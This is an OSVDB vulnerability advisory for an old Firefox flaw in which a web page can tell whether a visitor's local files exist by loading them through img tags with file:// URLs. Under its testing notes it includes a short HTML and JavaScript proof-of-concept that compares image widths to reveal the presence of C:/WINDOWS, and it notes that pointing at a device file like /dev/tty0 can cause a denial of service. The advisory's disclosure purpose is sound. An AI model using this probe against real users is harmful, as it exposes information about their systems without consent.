Mozilla Firefox IMG Tag Remote File Existance Verification

2001-02-16T05:17:09
ID OSVDB:11590
Type osvdb
Reporter Gabriel Cabillón(), Wolfgang Schwarz()
Modified 2001-02-16T05:17:09

Description

Vulnerability Description

Firefox contains a flaw that may allow a malicious user to determine the existance of a victim's local files. The issue is triggered when an attacker tests whether a file is successfully included in the page. It is possible that the flaw may allow the attacker to determine the existance of local images, disclose information, or cause a DoS resulting in a loss of confidentiality and/or availability.

Solution Description

Upgrade to version 1.0 Preview Release or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Firefox contains a flaw that may allow a malicious user to determine the existance of a victim's local files. The issue is triggered when an attacker tests whether a file is successfully included in the page. It is possible that the flaw may allow the attacker to determine the existance of local images, disclose information, or cause a DoS resulting in a loss of confidentiality and/or availability.

Manual Testing Notes

DoS can be caused by referencing device files (e.g. "/dev/tty0") on some systems.

Following tests whether image is on victim's computer:

<img src="file:///c|/nonexistent/content.gif"> <img src="file:///c|/windows/content.gif">

<script> onload =function(){ incl=(document.images[0].width!=document.images[1].width)? "" :"not "; alert("Windows is "+ incl +"installed in C:/WINDOWS/"); } </script>

References:

Vendor URL: http://www.mozilla.org/ Vendor Specific News/Changelog Entry: https://bugzilla.mozilla.org/show_bug.cgi?id=69070 Secunia Advisory ID:13144 Related OSVDB ID: 11591 Related OSVDB ID: 11592